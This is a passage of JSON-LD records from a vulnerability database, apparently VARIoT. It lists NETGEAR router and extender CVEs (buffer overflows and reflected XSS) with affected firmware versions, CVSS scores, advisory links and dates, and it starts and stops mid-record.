"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20754"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000060628/security-advisory-for-post-authentication-buffer-overflow-on-some-routers-modem-routers-and-extenders-psv-2018-0054"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20754"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67658"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015459"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1365"
},
{
"db": "NVD",
"id": "CVE-2019-20754"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-67658"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015459"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1365"
},
{
"db": "NVD",
"id": "CVE-2019-20754"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-67658"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015459"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1365"
},
{
"date": "2020-04-16T22:15:12.853000",
"db": "NVD",
"id": "CVE-2019-20754"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-67658"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015459"
},
{
"date": "2020-04-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1365"
},
{
"date": "2024-11-21T04:39:16.570000",
"db": "NVD",
"id": "CVE-2019-20754"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Classic buffer overflow vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015459"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1365"
}
],
"trust": 0.6
}
}
var-202004-0736
Vulnerability from variot
Certain NETGEAR devices are affected by reflected XSS. This affects EX7000 before 1.0.0.64, EX6200 before 1.0.3.86, EX6150 before 1.0.0.38, EX6130 before 1.0.0.22, EX6120 before 1.0.0.40, EX6100 before 1.0.2.22, EX6000 before 1.0.0.30, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, R8300 before 1.0.2.94, R7300DST before 1.0.0.62, R7000P before 1.3.0.20, R6900P before 1.3.0.20, R6400 before 1.0.1.32, R6300v2 before 1.0.4.24, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.18, and WN2500RPv2 before 1.0.1.52. plural NETGEAR A cross-site scripting vulnerability exists in the device.Information may be obtained and tampered with
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0736",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ex6130",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.24"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.86"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.32"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.86"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "r8300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.94"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015367"
},
{
"db": "NVD",
"id": "CVE-2019-20756"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6120_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6130_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6150_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8300_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015367"
}
]
},
"cve": "CVE-2019-20756",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2019-20756",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2019-015367",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2019-20756",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-20756",
"impactScore": 4.2,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2019-015367",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20756",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20756",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2019-015367",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1367",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015367"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1367"
},
{
"db": "NVD",
"id": "CVE-2019-20756"
},
{
"db": "NVD",
"id": "CVE-2019-20756"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by reflected XSS. This affects EX7000 before 1.0.0.64, EX6200 before 1.0.3.86, EX6150 before 1.0.0.38, EX6130 before 1.0.0.22, EX6120 before 1.0.0.40, EX6100 before 1.0.2.22, EX6000 before 1.0.0.30, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, R8300 before 1.0.2.94, R7300DST before 1.0.0.62, R7000P before 1.3.0.20, R6900P before 1.3.0.20, R6400 before 1.0.1.32, R6300v2 before 1.0.4.24, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.18, and WN2500RPv2 before 1.0.1.52. plural NETGEAR A cross-site scripting vulnerability exists in the device.Information may be obtained and tampered with",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20756"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015367"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20756",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015367",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1367",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015367"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1367"
},
{
"db": "NVD",
"id": "CVE-2019-20756"
}
]
},
"id": "VAR-202004-0736",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4030733621428571
},
"last_update_date": "2024-11-23T22:29:40.068000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Reflected Cross-Site Scripting on Some Routers and Extenders, PSV-2017-0709",
"trust": 0.8,
"url": "https://kb.netgear.com/000060643/Security-Advisory-for-Reflected-Cross-Site-Scripting-on-Some-Routers-and-Extenders-PSV-2017-0709"
},
{
"title": "Multiple NETGEAR Fixes for product cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116596"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015367"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1367"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015367"
},
{
"db": "NVD",
"id": "CVE-2019-20756"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://kb.netgear.com/000060643/security-advisory-for-reflected-cross-site-scripting-on-some-routers-and-extenders-psv-2017-0709"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20756"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20756"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015367"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1367"
},
{
"db": "NVD",
"id": "CVE-2019-20756"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015367"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1367"
},
{
"db": "NVD",
"id": "CVE-2019-20756"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015367"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1367"
},
{
"date": "2020-04-16T22:15:12.977000",
"db": "NVD",
"id": "CVE-2019-20756"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015367"
},
{
"date": "2020-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1367"
},
{
"date": "2024-11-21T04:39:16.957000",
"db": "NVD",
"id": "CVE-2019-20756"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1367"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Cross-site scripting vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015367"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1367"
}
],
"trust": 0.6
}
}
var-202112-2345
Vulnerability from variot
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects CBR750 before 3.2.18.2, D6220 before 1.0.0.68, D6400 before 1.0.0.102, D8500 before 1.0.3.60, LAX20 before 1.1.6.28, MK62 before 1.0.6.116, MR60 before 1.0.6.116, MS60 before 1.0.6.116, R6300v2 before 1.0.4.50, R6400 before 1.0.1.68, R6400v2 before 1.0.4.118, R6700v3 before 1.0.4.118, R6900P before 1.3.3.140, R7000 before 1.0.11.116, R7000P before 1.3.3.140, R7850 before 1.0.5.68, R7900 before 1.0.4.38, R7900P before 1.4.2.84, R7960P before 1.4.2.84, R8000 before 1.0.4.68, R8000P before 1.4.2.84, RAX15 before 1.0.3.96, RAX20 before 1.0.3.96, RAX200 before 1.0.4.120, RAX35v2 before 1.0.3.96, RAX40v2 before 1.0.3.96, RAX43 before 1.0.3.96, RAX45 before 1.0.3.96, RAX50 before 1.0.3.96, RAX75 before 1.0.4.120, RAX80 before 1.0.4.120, RBK752 before 3.2.17.12, RBK852 before 3.2.17.12, RBR750 before 3.2.17.12, RBR850 before 3.2.17.12, RBS750 before 3.2.17.12, RBS850 before 3.2.17.12, RS400 before 1.5.1.80, and XR1000 before 1.0.0.58. plural NETGEAR The device contains a vulnerability related to out-of-bounds writes.Service operation interruption (DoS) It may be in a state. This affects CBR750 prior to 3.2.18.2, D6220 prior to 1.0.0.68, D6400 prior to 1.0.0.102, D8500 prior to 1.0.3.60, LAX20 prior to 1.1.6.28, MK62 prior to 1.0.6.116, MR60 prior to 1.0.6.116, MS60 prior to 1.0.6.116, R6300v2 prior to 1.0.4.50, R6400 prior to 1.0.1.68, R6400v2 prior to 1.0.4.118, R6700v3 prior to 1.0.4.118, R6900P prior to 1.3.3.140, R7000 prior to 1.0.11.116, R7000P prior to 1.3.3.140, R7850 prior to 1.0.5.68, R7900 prior to 1.0.4.38, R7900P prior to 1.4.2.84, R7960P prior to 1.4.2.84, R8000 prior to 1.0.4.68, R8000P prior to 1.4.2.84, RAX15 prior to 1.0.3.96, RAX20 prior to 1.0.3.96, RAX200 prior to 1.0.4.120, RAX35v2 prior to 1.0.3.96, RAX40v2 prior to 1.0.3.96, RAX43 prior to 1.0.3.96, RAX45 prior to 1.0.3.96, RAX50 prior to 1.0.3.96, RAX75 prior to 1.0.4.120, RAX80 prior to 1.0.4.120, RBK752 prior to 3.2.17.12, RBK852 prior to 3.2.17.12, RBR750 prior to 3.2.17.12, RBR850 prior to 3.2.17.12, RBS750 prior to 3.2.17.12, RBS850 prior to 3.2.17.12, RS400 prior to 1.5.1.80, and XR1000 prior to 1.0.0.58
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202112-2345",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rbr750",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "3.2.17.12"
},
{
"model": "mr60",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.116"
},
{
"model": "ms60",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.116"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.68"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.2.84"
},
{
"model": "rax15",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.96"
},
{
"model": "rax35",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.96"
},
{
"model": "rax45",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.96"
},
{
"model": "rbk752",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "3.2.17.12"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.2.84"
},
{
"model": "rax43",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.96"
},
{
"model": "cbr750",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "3.2.18.2"
},
{
"model": "rbr850",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "3.2.17.12"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "rax80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.120"
},
{
"model": "rs400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.5.1.80"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.140"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.118"
},
{
"model": "rbs750",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "3.2.17.12"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.118"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.68"
},
{
"model": "xr1000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "rbs850",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "3.2.17.12"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.38"
},
{
"model": "rax50",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.96"
},
{
"model": "lax20",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.28"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.50"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.140"
},
{
"model": "rax200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.120"
},
{
"model": "rbk852",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "3.2.17.12"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.11.116"
},
{
"model": "rax40",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.96"
},
{
"model": "r7960p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.2.84"
},
{
"model": "rax75",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.120"
},
{
"model": "mk62",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.6.116"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.60"
},
{
"model": "rax20",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.96"
},
{
"model": "r7850",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.68"
},
{
"model": "mr60",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
